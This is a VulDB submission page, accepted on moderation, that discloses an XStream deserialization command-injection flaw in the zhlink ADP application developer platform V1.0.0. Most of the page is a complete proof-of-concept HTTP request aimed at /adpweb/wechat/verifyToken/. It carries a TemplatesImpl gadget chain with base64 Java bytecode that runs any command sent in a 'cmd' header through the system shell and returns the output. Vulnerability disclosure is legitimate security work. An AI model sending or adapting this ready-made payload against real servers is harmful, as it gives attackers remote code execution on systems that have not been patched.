| Titel | 智互联(深圳)科技有限公司 ADP应用开发者平台 zhlink V1.0.0 Command Injection |
|---|
| Beschreibung | 漏洞地址:http://x.x.x.x:8082/adpweb/a/login
漏洞原理,存在Xstream反序列化漏洞,导致可命令执行,使用如下POC测试可执行命令:
POST /adpweb/wechat/verifyToken/ HTTP/1.1
Host: x.x.x.x:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Content-Type: text/xml
cmd: ipconfig
Content-Length: 7407
<java.util.PriorityQueue serialization="custom">
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class="org.apache.commons.beanutils.BeanComparator">
<property>outputProperties</property>
<comparator class="java.lang.String$CaseInsensitiveComparator"/>
</comparator>
</default>
<int>3</int>
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom">
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<default>
<__name>P</__name>
<__bytecodes>
<byte-array>yv66vgAAADEBCQEAH29yZy9hcGFjaGUvbG9nZ2luZy9mZS9GaWxlVXRpbHMHAAEBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwADAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBACFMb3JnL2FwYWNoZS9sb2dnaW5nL2ZlL0ZpbGVVdGlsczsMAAUABgoABAAMAQADcnVuDAAOAAYKAAIADwEAEGdldFJlcUhlYWRlck5hbWUBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAA2NtZAgAEwEAHmphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbgcAFQEAE2phdmEvbGFuZy9FeGNlcHRpb24HABcBABNqYXZhL2xhbmcvVGhyb3dhYmxlBwAZAQAFdmFyMTUBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEABXZhcjEzAQAFdmFyMTQBAAV2YXIxMgEACHJlc3BvbnNlAQASTGphdmEvbGFuZy9PYmplY3Q7AQAGd3JpdGVyAQAQTGphdmEvaW8vV3JpdGVyOwEABHZhcjcBABJMamF2YS9sYW5nL1N0cmluZzsBAAR2YXI2AQABSQEABHZhcjUBABVMamF2YS91dGlsL0FycmF5TGlzdDsBAAR2YXIzAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEABHZhcjQBAAR2YXIyAQAEdmFyMAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAEdmFyMQEAE1tMamF2YS9sYW5nL1RocmVhZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QHADIHADEBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAcANQEAEGphdmEvbGFuZy9PYmplY3QHADcBABNqYXZhL3V0aWwvQXJyYXlMaXN0BwA5AQAQamF2YS9sYW5nL1N0cmluZwcAOwEADVN0YWNrTWFwVGFibGUBABBqYXZhL2xhbmcvVGhyZWFkBwA+AQAKZ2V0VGhyZWFkcwgAQAEAD2phdmEvbGFuZy9DbGFzcwcAQgEAEltMamF2YS9sYW5nL0NsYXNzOwcARAEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwwARgBHCgBDAEgBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgwASgBLCgAzAEwBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAE4ATwoAMwBQAQAHZ2V0TmFtZQwAUgASCgA/AFMBAARodHRwCABVAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoMAFcAWAoAPABZAQAIQWNjZXB0b3IIAFsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsMAF0AXgoAOABfAQAGdGFyZ2V0CABhAQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwAYwBkCgBDAGUKADYATAEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DABoAGkKADYAagEACGVuZHBvaW50CABsAQAGdGhpcyQwCABuAQAHaGFuZGxlcggAcAEADWdldFN1cGVyY2xhc3MMAHIAXgoAQwBzAQAGZ2xvYmFsCAB1AQAOZ2V0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7DAB3AHgKAEMAeQEAIm9yZy5hcGFjaGUuY295b3RlLlJlcXVlc3RHcm91cEluZm8IAHsBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIHAH0BAAlsb2FkQ2xhc3MBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7DAB/AIAKAH4AgQoAQwBTAQAKcHJvY2Vzc29ycwgAhAEABHNpemUBAAMoKUkMAIYAhwoAOgCIAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7DABoAIoKADoAiwEAA3JlcQgAjQEAB2dldE5vdGUIAI8BABFqYXZhL2xhbmcvSW50ZWdlcgcAkQEABFRZUEUBABFMamF2YS9sYW5nL0NsYXNzOwwAkwCUCQCSAJUBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwwAlwCYCgCSAJkBAAlnZXRIZWFkZXIIAJsBAAlnZXRNZXRob2QMAJ0ARwoAQwCeDAARABIKAAIAoAEAC2dldFJlc3BvbnNlCACiAQAJZ2V0V3JpdGVyCACkAQAOamF2YS9pby9Xcml0ZXIHAKYBAARleGVjAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsMAKgAqQoAAgCqAQAFd3JpdGUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYMAKwArQoApwCuAQAFZmx1c2gMALAABgoApwCxAQAFY2xvc2UMALMABgoApwC0AQAHaXNMaW51eAEAAVoBAAZvc1R5cGUBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAAmluAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQABcwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAAdleGVjUmVzAQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwcAugEAE2phdmEvaW8vSW5wdXRTdHJlYW0HAMMBABFqYXZhL3V0aWwvU2Nhbm5lcgcAxQEAB29zLm5hbWUIAMcBABBqYXZhL2xhbmcvU3lzdGVtBwDJAQALZ2V0UHJvcGVydHkMAMsAqQoAygDMAQALdG9Mb3dlckNhc2UMAM4AEgoAPADPAQADd2luCADRAQAHL2Jpbi9zaAgA0wEAAi1jCADVAQAHY21kLmV4ZQgA1wEAAi9jCADZAQARamF2YS9sYW5nL1J1bnRpbWUHANsBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DADdAN4KANwA3wEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMAKgA4QoA3ADiAQARamF2YS9sYW5nL1Byb2Nlc3MHAOQBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07DADmAOcKAOUA6AEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgwABQDqCgDGAOsBAAJcYQgA7QEA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</byte-array>
</__bytecodes>
<__transletIndex>-1</__transletIndex>
<__indentNumber>0</__indentNumber>
</default>
<boolean>false</boolean>
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/>
</java.util.PriorityQueue>
</java.util.PriorityQueue> |
|---|
| Quelle | ⚠️ http://x.x.x.x:8099/adpweb/wechat/verifyToken/ |
|---|
| Benutzer | Id3al (UID 85503) |
|---|
| Einreichung | 20.05.2025 02:55 (vor 11 Monaten) |
|---|
| Moderieren | 29.05.2025 10:34 (9 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 310496 [zhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 verifyToken erweiterte Rechte] |
|---|
| Punkte | 20 |
|---|